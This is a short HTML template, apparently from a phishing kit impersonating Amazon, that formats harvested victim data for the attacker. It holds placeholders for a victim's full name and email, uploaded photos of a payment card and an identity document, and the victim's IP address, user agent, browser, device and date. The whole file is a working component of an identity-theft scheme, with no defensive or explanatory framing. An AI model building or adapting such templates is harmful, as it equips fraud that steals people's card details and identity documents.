<div style="width:60%;border:2px solid #333;margin:0 auto;">
    <center><h3 style="font-weight: bold;font-family:monospace;">Shin-RyuJin Amazon</h3><hr style="width:80%;border:1px solid #111"></center>
<pre style="margin-left:10%">
## PHOTO DETAILS ##

FullName           :: {fullname}
Email              :: {email}
---------------------------

<b>PHOTO CARD</b>
<img src="{photo_card}" style="width:80%;max-width: 90%;margin: 0 auto;border: 1px solid #333;max-height: 100%">
<br><br>
<b>PHOTO IDENTITY</b>
<img src="{photo_id}" style="width:80%;max-width: 90%;margin: 0 auto;border: 1px solid #333;max-height: 100%">
---------------------------

## ACCESS INFORMATION ##

User IP            :: {ip}
UserAgent          :: {agent}
Browser            :: {browser}
Device             :: {device}
Date               :: {date}
</pre>
</div>